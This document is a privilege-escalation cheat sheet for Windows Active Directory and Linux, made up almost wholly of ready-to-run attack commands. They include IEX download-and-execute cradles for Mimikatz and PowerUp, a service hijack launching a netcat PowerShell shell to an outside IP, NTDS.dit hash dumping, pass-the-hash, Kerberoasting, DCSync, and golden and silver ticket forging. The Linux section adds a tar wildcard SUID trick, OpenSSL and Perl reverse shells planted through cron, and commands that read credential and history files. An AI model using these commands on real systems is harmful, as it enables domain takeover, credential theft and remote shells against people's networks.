PRIVESC

Priviledge Escalation

====================

WINDOWS

====================

PowerUp:

IEX(New-Object Net.WebClient).downloadString('<url>/PowerUp.ps1') ;Invoke-AllChecks
 


Mimikatz:

IEX(New-Object Net.WebClient).downloadString('<url>/MimiKatz.ps1') ;Invoke-Mimikatz -DumpCreds
 


Unquoted Service Paths:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """



Weak Permissions on Services Registry:

1.) Find explpoitable services

.\accesschk -accepteula -uvwc *


2.) Change Service ImagePath Value

cmd /c sc config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc64.exe -e powershell 10.10.14.21 8087"


3.) Verify That Value

reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"


4.) Start The Service To Execute Payload

cmd /c sc stop usosvc
cmd /c sc start usosvc



When a domain controller is compromised we can make a copy or backup of the NTDS.dit file and obtain password hashes of all the domain users.


=================================

DISKSHADOW NTDS.DIT METHOD

=================================

This requires backup and restore priviledges


diskshadow
set context persistent nowriters
add volume c: alias dmwong
create
expose %dmwong% z:


Now importing the the dll files here https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug into powershell we can get our backup
REOSURCE: https://github.com/giuliano108/SeBackupPrivilege


# Import the following dll modules


Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

# Create the backup and set permissions


Set-SeBackupPriviledge
Get-SeBackupPriviledge

Copy-FileSeBackupPriviledge Z:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit c:\temp\ndts.dit
reg save hklm\system c:\temp\system.bak

Download ntds.dit to your attack machine and issue the below command to extract the hashes


python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system.bak LOCAL



=====================================

VSSADMIN NTDS.DIT EXTRACTION METHOD     
=====================================
This requires admin rights. If this file is compromised you have password hashes for all the user accounts in the domain.
File is located on domain controllers at C:\Windows\NTDS\ntds.dit
File is always in use by Active Directory. Service would need to be stopped to move the file.
File can also be moved by using shadow copy.

CMD> vssadmin create shadow for 'C:\'
# This creates a copy of entire C Drive. We copy the ntds.dit file out of there to a temp file

CMD> copy \\CopyShadowCopyVolumeNameValueFromAboveOutputAndPlaceHere\Windows\NTDS\ntds.dit C:\Temp\ntds.dit

Everything is encrypted in the dit file with a local system file.
CMD> reg sav HKLM:\SYSTEM C:\Temp\Sys
# This info can be used to decrypt the file

# File was copied while open so we need to repair disk to successfully decrypt database.
CMD> esentutl /p C:\Temp\ntds.dit /!10240 /8 /o

PS> $Key = Get-BootKey -SystemHiveFilePath "C:\temp\SYS"
PS> Get-ADDBAccount -All -BootKey $Key -DbPath "C:\Windows\ntds.dit" | Out-File C:\Temp\UncrackedInfo.txt



============================================
|                                    PASS THE HASH                                     |
============================================
If a user account has admin rights to a system, those rights can be used to view other creds stored in memory.
Those newly found admin creds can than be used to access remote machines.

mimikatz # sekurlsa::logonpasswords
# Find admin accounts to exploit from above output.
# Copy that admins NTLM password hash
NTLM: 13b29964cc2480b4ef454c59562e675c

mimikatz# sekurlsa::pth /user:adminaccount.name /domain:usav.org /ntlm:13b29964cc2480b4ef454c59562e675c
# This starts a command prompt.
# Whoami returns normal user but process is running as admin. This allows access to remote systems as that admin.
# This creates lateral movement.



===================

Kerberoasting:

===================

To  begin make sure Port 88 is available (port forward if needed). 


Make sure your time and timezone and the targets time are in sync, 

  

View Time In Windows

tzdate /g


View Time In Linux

date


Obtain a Ticket Hash

  Import-Module Invoke-Kerberoast.ps1
 Invoke-Kerberoast -ErrorAction SilentlyContinue -OutputFormat hashcat

Crack the obtained ticket hash using certain rule set

  hashcat -m 13100 ./mturner /usr/share/wordlists/rockyou.txt rules/_NSAKEY.v2.dive.rule –debug-mode=1 –debug-file=matched.rule –force -0


First get SPNs with one of the following techniques:


Remote via Impacket:

GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>
 

Local via setspn.exe:

Add-Type -AssemblyName System.IdentityModel  
setspn.exe -T <domain> -Q */* | Select-String '^CN' -Context 0,1 |  % { New-Object System.  IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList  $_.Context.PostContext[0].Trim() }  
 

Local via Powershell:

Add-Type -AssemblyName System.IdentityModel  
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/<user>.<domain>"  
 

Local via PowerSploit:

powershell.exe -Command 'IEX (New-Object Net.Webclient).DownloadString("http://<ip>:<port>/Invoke-Kerberoast.ps1");Invoke-Kerberoast -OutputFormat Hashcat
 

The result of this step will be the hash of a kerberos ticket. It can directly be cracked with hashcat64.exe -m 13100 roasted.hash <wordlist>.


Kerberos ticket export oneliner:

powershell.exe  -exec bypass IEX (New-Object) Net.WebClient).DownloadString('<url to  MimiKatz.ps1>'); Invoke-Mimikatz -Command "kerberos::list /export"
 

Juicy Potato (Metasploit) HERE

use windows/local/ms16_075_reflection_juicy`
set SESSION <>
set CLSID <>
 


PowerView:

All kinds of useful domain related commands.


List Domain Users With PowerView:

Get-DomainUser -Credential $cred -DomainController <dc>
Get-DomainUser -Credential $cred -DomainController <dc> | select samAccountName, logoncount, lastlogon




=====================================
|                             DCSYNC ATTACK                            |
=====================================

Can be performed without performing any logon to Domain Controllers

mimikatz.exe
mimikatz # lsadump::dcsync /domain:usav.org /user:krbtgt
# The above account can be used to get Golden Tickets




==============================
|                GOLDEN TICKET RECIPE               |
==============================
{{{{FIRST PIECE OF INFO NEEDED}}}}
DOMAIN      : usav.org

# This is of course the domain you are in

{{{{SECOND PIECE OF INFO NEEDED}}}}
DOMAIN SID  : S-1-5-21-277898991-1934889977-1734353810

# Whlie logged onto a domain computer issue the below command and leave off the last five digits

PS> whoami /user

USER INFORMATION
----------------

User Name    SID
============ ==============================================
usav\roadmin S-1-5-21-277898991-1934889977-1734353810-15291

{{{{THIRD PIECE OF INFO NEEDED}}}}}
KRBTGT      : a49e8edf15676c64e31878a59d2bc319

# Password Hash, need to be Domain Admin to get this
# Issue below commands as DC admin in mimikatz.

mimikatz # lsadump::dcsync /usav:hostFQDN.usav.org /user:krbtgt

Copy the "Hash NTLM" password line hash in the "Credentials" section and that is the KRBTGT value we need.

******************************************
GRANT YOURSELF THE GOLDEN TICKET
******************************************
mimikatz # kerberos::golden /domain:usav.org /sid:S-1-5-21-277898991-1934889977-1734353810 /rc4:a49e8edf15676c64e31878a59d2bc319 /id:500 /user:TrustMeImAdmin

# The /id siwthc value o 500 is for admin accounts. Specify name of the user in the /user field. I believe this can be anything you want.
# Golden ticket will be saved as file ticket.kirbi

*****************************************************
USE TICKET WITH KERBEROS PASS THE TICKET COMMAND
*****************************************************
mimikatz # kerberos::ptt ticket.kirbi
# The above loads ticket into memory.
# open a cmd prompt. Whoami returns normal user but process runs as admin. This allows Domain Admin access to a domain controller. Ticket doesnt expire basically ever.




================================
|                       SILVER TICKETS                       |
================================

NOTE: See golden ticket if you have trouble getting any info

Allows attacker to create forge TGS tickets that give an attacker access to a particular service on a particular server
No special priviledges required to do this. Can be done by any user and does not require any communication with a Domain Controller.
All that is needed is a password for a service account.

1.) KERBEROAST
PS> Add-Type -AssemblyName System.IdentityModel
PS> New-Object -TypeName System.IdentityModel.Tokens.KerberosRequestForSecurityToken -ArgumentList "MSSQLsvc/
mimikatz.exe
kerberos::list /export
Python ./tgsrepcrack.py wordlist.txt 1-00a10000-admin@MSSQLSvc~usavdesktop.usav.org~1433-USAV.ORG.kirbi

2.) CONVERT TO NTLM
PS> Import-Module DSInternals
PS> $Pwd = ConvertTo-SecureString 'P@ssw0rd!' -AsPlainText -Force
PS> ConvertTo-NTHash $Pwd

13b29964cc2480b4ef454c59562e675c

PS> whoami /user
USER INFORMATION
----------------
User Name    SID
============ ==============================================
usav\roadmin S-1-5-21-277898991-1934889977-1734353810-15291

3.) SILVER TICKET
mimikatz # kerberos::golden /domain:usav.org /sid:S-1-5-21-277898991-1934889977-1734353810 /ptt /target:sqlserviceOnServer.usav.org:1433 /service:MSSQLSvc /rc4:a49e8edf15676c64e31878a59d2bc319 /id:1103 /user:IveGotASilverTicket
# This can be used to join groups to elevate privledges
CMD> klist
# The above command will show your bogus tickets.

sqlcmd -S ServerWithSqlService.usav.org

SELECT SYSTEM_USER;
GO


====================

LINUX

====================


Abusing Common Tools

A nice collection of abusable tools can be found at GTFOBins.

https://gtfobins.github.io/


Abusing Tar

If  tar is allowed in sudoers with a wildcard command we can abuse that for  privilege escalation. Filenames will be interpreted as command line  arguments therefore we can create the following setup:

Create these files in the directory

-rw-r–r–. 1 xxx xxx 0 Oct 28 19:19 –checkpoint=1

-rw-r–r–. 1 xxx xxx 0 Oct 28 19:17 –checkpoint-action=exec=sh payload.sh

-rwxr-xr-x. 1 xxx xxx 12 Oct 28 19:17 payload.sh

To create the files use:

echo "chmod u+s /usr/bin/find" > payload.sh

echo "" > "--checkpoint-action=exec=sh payload.sh"

echo "" > --checkpoint=1

Using find as the payload has the charm that we can execute commands via find f1 -exec "whoami" \; (file f1 must exist)



Abusing TCPDump

With -z you can execute commands via TCPDump.



Abusing OpenSSL

Openssl  can read files and write into files via network. So it can be used for  exfil and infil of Data. In addition a bind or reverse shell can be  implemented via OpenSSL, e.g.:

openssl.exe  s_client -quiet -connect <ip>:<port> | cmd.exe |  openssl.exe s_client -quiet -connect <ip>:<port>`


Rsync

If permissions allow it one can get RCE with RSync by overwriting the cronjobs file.

*  * * * * root perl -e 'use  Socket;$i="<ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh  -i");}; 


  

NFS Shares

When  mounting nfs-shares with mount <ip>:/<path> <folder>  you can impersonate users by running the command with a local user that  has the uid you want to use on target box, as it just matches the uids  when checking for permissions.

Interesting Reads

    Privilege escalation using LD_PRELOAD

    Linux privilege escalation using shared libraries

    Abusing Shared Libraries



Determine Linux Distribution and Version    

For Finding Kernel Exploits

cat /etc/issue  

 cat /etc/*-release   

cat /etc/lsb-release   

cat /etc/redhat-release


Determine Kernel Version

cat /proc/version   

uname -a   

uname -mrs   

rpm -q kernel   

dmesg | grep Linux   

ls /boot | grep vmlinuz-


Get Environment Variables

cat /etc/profile   

cat /etc/bashrc   

cat ~/.bash_profile   

cat ~/.bashrc   

cat ~/.bash_logout   

env

set

printenv <env name>


Get Running Services

ps aux   

ps -ef   

top   

htop

cat /etc/service


Root Services

ps aux | grep root   

ps -ef | grep root


Installed Applications

ls -alh /usr/bin/   

ls -alh /sbin/   

dpkg -l   

apt list --installed

rpm -qa   

ls -alh /var/cache/apt/archivesO   

ls -alh /var/cache/yum/



Syslog Configuration   

cat /etc/syslog.conf   

cat /var/log/syslog.conf   

(or just: locate syslog.conf)


Web Server Configs

cat /etc/chttp.conf   

cat /etc/lighttpd.conf   

cat /etc/apache2/apache2.conf   

cat /etc/httpd/conf/httpd.conf   

cat /opt/lampp/etc/httpd.conf



PHP Configuration   

/etc/php5/apache2/php.ini    

   

Printer (cupsd) Configuration   

cat /etc/cups/cupsd.conf       


MySql   

cat /etc/my.conf 


Inetd Configuration   

cat /etc/inetd.conf 


List All 

ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' 


Determine Scheduled Jobs    

crontab -l   

ls -alh /var/spool/cron   

ls -al /etc/ | grep cron   

ls -al /etc/cron*   cat /etc/cron*   

cat /etc/at.allow   

cat /etc/at.deny   

cat /etc/cron.allow   

cat /etc/cron.deny   

cat /etc/crontab   

cat /etc/anacrontab   

cat /var/spool/cron/crontabs/root 


Locate Any Plaintext Usernames and Passwords   

grep -i user [filename]   

grep -i pass [filename]   

grep -C 5 "password" [filename]   

find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"  


Identify Connected Users and Hosts   

lsof -i    

lsof -i :80   

ss -ant

ss -anl

grep 80 /etc/services   

netstat -antup   

netstat -antpx   

netstat -tulpn   

chkconfig --list   

chkconfig --list | grep 3:on   

last   

w   


Check For Ports Open for Local Only Connections   

netstat -tupan    

ss -anlt



Check User History for Credentials and Activity   

cat ~/.bash_history   

cat ~/.nano_history   

cat ~/.atftp_history   

cat ~/.mysql_history    

cat ~/.php_history 


Check User Profile and Mail   

cat ~/.bashrc   

cat ~/.profile   

cat /var/mail/root   

cat /var/spool/mail/root       



Finding Exploit Code  

/pentest/exploits/exploitdb/searchsploit "kernel"  | grep -i "root"   

cat /pentest/exploits/exploitdb/files.csv |grep -i privile   

grep -i X.X /pentest/exploits/exploitdb/files.csv | grep -i local    

grep -i application /pentest/exploits/exploitdb/files.csv | grep -i local   


    

Check Development Environment on Target Hosts  

find / -name perl*   

find / -name python*   find / -name gcc*    

find / -name cc      



How Can Files Be Uploaded?   

find / -name wget   

find / -name nc*   

find / -name netcat*   

find / -name tftp*    find / -name ftp   

# If port 22 is open, use srvdir for SSH egress